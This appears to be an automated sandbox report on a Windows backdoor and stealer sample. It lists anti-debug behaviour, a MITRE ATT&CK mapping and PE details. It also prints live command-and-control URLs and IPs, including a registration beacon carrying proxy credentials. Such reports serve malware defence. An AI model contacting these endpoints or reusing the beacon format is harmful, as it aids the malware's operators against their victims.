        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031501A1 rdtsc 0_2_031501A1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeAPI coverage: 6.7 %
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576011685.00000000013CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031501A1 rdtsc 0_2_031501A1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03121227 mov edx, dword ptr fs:[00000030h]0_2_03121227
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03122A45 mov edx, dword ptr fs:[00000030h]0_2_03122A45
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031261D1 mov edx, dword ptr fs:[00000030h]0_2_031261D1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031261CB mov edx, dword ptr fs:[00000030h]0_2_031261CB
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0313088D mov eax, dword ptr fs:[00000030h]0_2_0313088D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031308A0 mov eax, dword ptr fs:[00000030h]0_2_031308A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0312268B mov ebx, dword ptr fs:[00000030h]0_2_0312268B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03121F6C cpuid 0_2_03121F6C

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		1
        Process Injection        		1
        Virtualization/Sandbox Evasion        		OS Credential Dumping21
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Process Injection        		LSASS Memory1
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media11
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Software Packing        		NTDS11
        System Information Discovery        		Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA SecretsInternet Connection DiscoverySSHKeylogging1
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture1
        Proxy        		Data Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1611944 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 11/02/2025 Architecture: WINDOWS Score: 92 22 Suricata IDS alerts for network traffic 2->22 24 Antivirus detection for URL or domain 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 3 other signatures 2->28 6 SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe 1 2->6         started        process3 dnsIp4 18 185.121.233.152, 14887, 49932 IPCORE-ASES Spain 6->18 20 46.8.232.106, 30001, 49903 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 6->20 30 Detected unpacking (overwrites its own PE header) 6->30 32 Found Tor onion address 6->32 10 WerFault.exe 2 6->10         started        12 WerFault.exe 2 6->12         started        14 WerFault.exe 2 6->14         started        16 WerFault.exe 2 6->16         started        signatures5 process6

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe26%VirustotalBrowse
        SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe34%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/0%Avira URL Cloudsafe
        http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXY0%Avira URL Cloudsafe
        http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse0%Avira URL Cloudsafe
        http://91.212.166.91:30001/api/helper-first-register0%Avira URL Cloudsafe
        http://46.8.232.106:30001/api/helper-first-register?0%Avira URL Cloudsafe
        http://www.picget.net/photoshine-photo-editor/buy.html0%Avira URL Cloudsafe
        http://46.8.232.106:300010%Avira URL Cloudsafe
        http://91.212.166.9:30001/api/helper-first-register0%Avira URL Cloudsafe
        http://46.8.232.106:30001/api/helper-first-register0%Avira URL Cloudsafe
        http://www.picget.net0%Avira URL Cloudsafe
        http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.10%Avira URL Cloudsafe
        http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV0%Avira URL Cloudsafe
        http://147.45.196.157:30001/api/helper-first-register2025/02/110%Avira URL Cloudsafe
        http://147.45.196.157:30001/api/helper-first-register100%Avira URL Cloudmalware
        http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f90%Avira URL Cloudsafe
        http://46.8.236.61:30001/api/helper-first-register0%Avira URL Cloudsafe

        Domains and IPs

        Download Network PCAP: filteredfull

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLsetrue
        • Avira URL Cloud: safe
        		unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C864000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.picget.net/photoshine-photo-editor/buy.htmlSecuriteInfo.com.Win32.Evo-gen.14890.8913.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://91.212.166.91:30001/api/helper-first-registerSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001/api/helper-first-register?SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://91.212.166.9:30001/api/helper-first-registerSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001/api/helper-first-registerSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXYSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C854000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.picget.netSecuriteInfo.com.Win32.Evo-gen.14890.8913.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.1SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://147.45.196.157:30001/api/helper-first-registerSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://147.45.196.157:30001/api/helper-first-register2025/02/11SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C84E000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://46.8.236.61:30001/api/helper-first-registerSecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        46.8.232.106
        		unknownRussian Federation
        		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticstrue
        185.121.233.152
        		unknownSpain
        		198432IPCORE-ASEStrue

        General Information

        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1611944
        Start date and time:2025-02-11 10:54:02 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Detection:MAL
        Classification:mal92.troj.evad.winEXE@5/1@0/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 64%
        • Number of executed functions: 1
        • Number of non-executed functions: 18
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        46.8.232.106https://nopaste.net/gFFvm8SLzBGet hashmaliciousGO Backdoor, LummaC StealerBrowse
        • 46.8.232.106/
        TEG0KQGWMBA1JEEN9AI3O7.exeGet hashmaliciousGO BackdoorBrowse
        • 46.8.232.106/
        TEG0KQGWMBA1JEEN9AI3O7.exeGet hashmaliciousGO BackdoorBrowse
        • 46.8.232.106/
        gFFvm8SLzB.ps1Get hashmaliciousLummaC StealerBrowse
        • 46.8.232.106/
        31gmoyUfdI.ps1Get hashmaliciousLummaC StealerBrowse
        • 46.8.232.106/
        5N0WWuwk3d.ps1Get hashmaliciousGO Backdoor, LummaC StealerBrowse
        • 46.8.232.106/
        europe.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
        • 46.8.232.106/
        nuI7Op1TKn.exeGet hashmaliciousGO BackdoorBrowse
        • 46.8.232.106/
        nuI7Op1TKn.exeGet hashmaliciousGO BackdoorBrowse
        • 46.8.232.106/
        dYkofBsuAX.exeGet hashmaliciousGO BackdoorBrowse
        • 46.8.232.106:30001/api/helper-first-register?buildVersion=0fpl.CnD2c8j&md5=889b99c52a60dd49227c5e485a016679&proxyPassword=2FUHyaZe&proxyUsername=MW4ljsAD&userId=MqUtaT2GmvCEuFsJrzrGaZuY
        185.121.233.15231gmoyUfdI.ps1Get hashmaliciousLummaC StealerBrowse
          europe.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
            Adlice Software.exeGet hashmaliciousGO BackdoorBrowse
              reduce.exeGet hashmaliciousGO BackdoorBrowse
                m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FIORD-ASIP-transitoperatorinRussiaUkraineandBalticshttps://nopaste.net/gFFvm8SLzBGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                  • 46.8.232.106
                  TEG0KQGWMBA1JEEN9AI3O7.exeGet hashmaliciousGO BackdoorBrowse
                  • 46.8.236.61
                  TEG0KQGWMBA1JEEN9AI3O7.exeGet hashmaliciousGO BackdoorBrowse
                  • 46.8.232.106
                  gFFvm8SLzB.ps1Get hashmaliciousLummaC StealerBrowse
                  • 46.8.236.61
                  31gmoyUfdI.ps1Get hashmaliciousLummaC StealerBrowse
                  • 46.8.232.106
                  5N0WWuwk3d.ps1Get hashmaliciousGO Backdoor, LummaC StealerBrowse
                  • 46.8.232.106
                  europe.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                  • 46.8.232.106
                  nuI7Op1TKn.exeGet hashmaliciousGO BackdoorBrowse
                  • 46.8.232.106
                  nuI7Op1TKn.exeGet hashmaliciousGO BackdoorBrowse
                  • 46.8.236.61
                  dYkofBsuAX.exeGet hashmaliciousGO BackdoorBrowse
                  • 46.8.236.61
                  IPCORE-ASES31gmoyUfdI.ps1Get hashmaliciousLummaC StealerBrowse
                  • 185.121.233.152
                  europe.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                  • 185.121.233.152
                  Adlice Software.exeGet hashmaliciousGO BackdoorBrowse
                  • 185.121.233.152
                  http://www.schoolhouselearningcenter.net/Get hashmaliciousUnknownBrowse
                  • 185.121.235.167
                  http://petruccilaw.com/Get hashmaliciousUnknownBrowse
                  • 185.121.235.167
                  http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                  • 185.121.235.167
                  over.ps1Get hashmaliciousVidarBrowse
                  • 185.121.235.167
                  https://www.tblgroup.com/tbl2/certificados-digitales/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                  • 185.121.235.167
                  reduce.exeGet hashmaliciousGO BackdoorBrowse
                  • 185.121.233.152
                  m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                  • 185.121.233.152

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\config

                  Download File
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1044
                  Entropy (8bit):6.345324725430294
                  Encrypted:false
                  SSDEEP:24:hpOmfEvZmGVA20Rx4udgRBabTPYjAeuoVs0EvrpCq:7Om5GVA9PwBCO0f4q
                  MD5:07DDB733765B7E0F203CFDE51BFA0A18
                  SHA1:8D45438B869D4DDA70527AA93E06420432AD3952
                  SHA-256:D8898D306A320BD6A3384DF95F76B91E4980B9F7EDCDD949983B67FA6E0DA252
                  SHA-512:5012B08F0767AD148A195E8FBE26859A6CADAEB4381E892B3ED279CA025AC86BFED6D5A5566F897E33DE08B105EEAA831F30C05D9DA82205FA2F0C7001E51796
                  Malicious:false
                  Reputation:low
                  Preview:.>;.... .4...(..S ..AV.3L;,"],..XW&?M.9TQ \@##3Q\..Z.."\Q..M..!X/.$^(.1U\.3S#..].(%S?..YQ.[^3. RV!.F!...%?..<*".7..A$].......P<.4.V.Z&V.."..RQ.N"...>$Y.7(..V!......-./N$W!.)"......>...T&!./.,..?...19../UO^.....+.#X.."!..PT+T2;.L?.0F.-:Z63.U.%.G7'7V43.M. 4[.7#]VP.U(%.G.$.X?-&R..0SRZ9]$,/S.[0YT.<^...R#!.FP6.......7 .+.+A..V...3. 2..."7...V.65%.2-"N.^..&...)!...(..P96.. $N%.....#......././ Y...1.7...,.=.)Z.O /...............3.T..6L]..F...W,;2R.)>GW..\(!,R.&6[..6@.?.R(W2_2T&X$:1M+..P .._.%.Y.$.Z..>^.:.S7.#Y&.;_(3.L.6..4)...&0..V.FT.;.P0T.5>..QZ\........./.*C.....7 .S;&..,_...R.$.VC-Y..Z\......(0..6.../...3...9 .....B*=W..W..2... ...#.*S)..A*..L...P0.._W.WM"(.[(1+_.9WQ$61G..._U!.UV.#_R[.@'..Z...S(..].P S...Y_/,^...R9$.F66..#,..Z(..2;.A,.,..!U.^....(U._$....>.R0.N..+.>...?_..\$..5...U-.N:.*...Z.P'2.....6*..P....8$..9X.T./O86 .....($4.'..... TW_UL...F..._.%0W..Q^+[W@5?.W.=.\...@.\.R.-.P.4$X6:*M-".X..*[6=)TX#-S...]<.PSW..Y..V^2P3R5$ F.....%?.[/S../!A.....7..?96.S.Q..40...%.S:4N..<...^..,.../,

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.656380007565565
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.37%
                  • InstallShield setup (43055/19) 0.43%
                  • Win32 Executable Delphi generic (14689/80) 0.15%
                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  File name:SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  File size:6'808'576 bytes
                  MD5:2e82e1c508af8197f9a033822e9d742f
                  SHA1:810bb59a46ef0ab3e164f4d45b2334d0f5af9e04
                  SHA256:50a606e258eabb822fe0b64ce17d91fcc17b1f4465aa874c2f3f1ff51fb3a956
                  SHA512:b1e33ab51f1fa0dee52799cee36ffe4e910d496e9f627e71e55aa9e06146ea95d1754e3f865972536e11bccb87fc994008e3861ede94e95390e38682ec3ab3fd
                  SSDEEP:98304:jGQ5LbtL0Q3ke/Yyiki2ODxc3ZtQNvBosQEdVXZv2bTjqVih/o:jnLbCYkVyjdODGJCbosQEdxe/o
                  TLSH:32664AC1AE539A02D796E2F9B1A12B61A1E6DC03D040C45371CEFD4C4BFA39E56B3B46
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                  File Icon

                  Icon Hash:130b030705070b97

                  Static PE Info

                  General

                  Entrypoint:0x4c5d30
                  Entrypoint Section:CODE
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  DLL Characteristics:DYNAMIC_BASE
                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:12162a611fb2169f101a204969fe495d
                  Instruction
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF0h
                  mov eax, 004C5AA8h
                  call 00007F5D2C62A019h
                  mov eax, dword ptr [007DA1B8h]
                  mov eax, dword ptr [eax]
                  call 00007F5D2C6883DDh
                  mov ecx, dword ptr [007D9FD4h]
                  mov eax, dword ptr [007DA1B8h]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [004BEA80h]
                  call 00007F5D2C6883DDh
                  mov ecx, dword ptr [007DA278h]
                  mov eax, dword ptr [007DA1B8h]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [004B66F4h]
                  call 00007F5D2C6883C5h
                  mov ecx, dword ptr [007DA01Ch]
                  mov eax, dword ptr [007DA1B8h]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [004B6498h]
                  call 00007F5D2C6883ADh
                  mov eax, dword ptr [007DA1B8h]
                  mov eax, dword ptr [eax]
                  call 00007F5D2C688421h
                  call 00007F5D2C627A80h
                  lea eax, dword ptr [eax+00h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3de0000x269e.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f00000x295e38.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e30000xc0fc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x3e20000x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
